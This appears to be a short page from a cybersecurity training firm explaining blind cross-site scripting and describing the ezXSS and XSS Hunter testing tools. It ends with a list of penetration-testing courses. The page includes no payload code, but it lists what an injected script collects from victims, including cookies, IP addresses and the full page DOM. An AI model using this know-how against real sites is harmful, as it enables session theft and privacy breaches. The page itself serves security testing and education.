Blind Cross Site Scripting
Blind cross site scripting (BXSS) is a variation of stored XSS, where the injection point and the execution point are different. It’s harder to find and certainly requires a different methodology than testing for stored (non-blind), reflected, or even DOM-based XSS.
Typically, with stored Blind cross site scripting, the payload is executed on the same page it was injected in.
ezXSS: Test Blind Cross Site Scripting
ezXSS is an easy way to test blind Cross Site Scripting.
Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts (also commonly referred to as a malicious payload) into a legitimate website or web application. XSS is amongst the most rampant of web application vulnerabilities and occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.
Features of ezXSS:
- Easy to use dashboard with statics, payloads, view/share/search reports and more
- Payload generator
- Instant email alert on the payload
- Custom javascript for extra testing
- Prevent double payloads from saving or alerting
- Share reports with other ezXSS users
- Easily manage and view reports in the system
- Search for reports in no time
- Secure your system account with extra protection (2FA)
- The following information is collected on a vulnerable page:
- The URL of the page
- IP Address
- Any page referer (or share referer)
- The User-Agent
- All Non-HTTP-Only Cookies
- Full HTML DOM source of the page
- Page origin
- Time of execution
- its just ez
Required
- PHP 5.5 or up
- A domain name (consider a short one)
- An SSL if you want to test on https websites (consider Cloudflare or Let’s Encrypt for a free SSL)
Blind Cross site Scripting (XSS) Vulnerability Detection
One of the major features that XSS Hunter offers is the ability to find blind XSS. This is a vulnerability where an XSS payload fires in another user’s browser (such as an administrative panel, support system, or logging application) which you cannot “see” (e.g. it does not fire in your browser). XSS Hunter addresses this by recording extensive information about each payload fire in its database.
Most Popular Training Courses at Indian Cyber Security Solutions
Summer Training for CSE, IT, BCA & MCA Students
Network Penetration Tester Training
Diploma in Web Application Security
Certified Web Application Penetration Tester
Certified Android Penetration Tester
Cybersecurity services that can protect your company:
Web Security | Web Penetration Testing
Network Penetration Tester – NPT
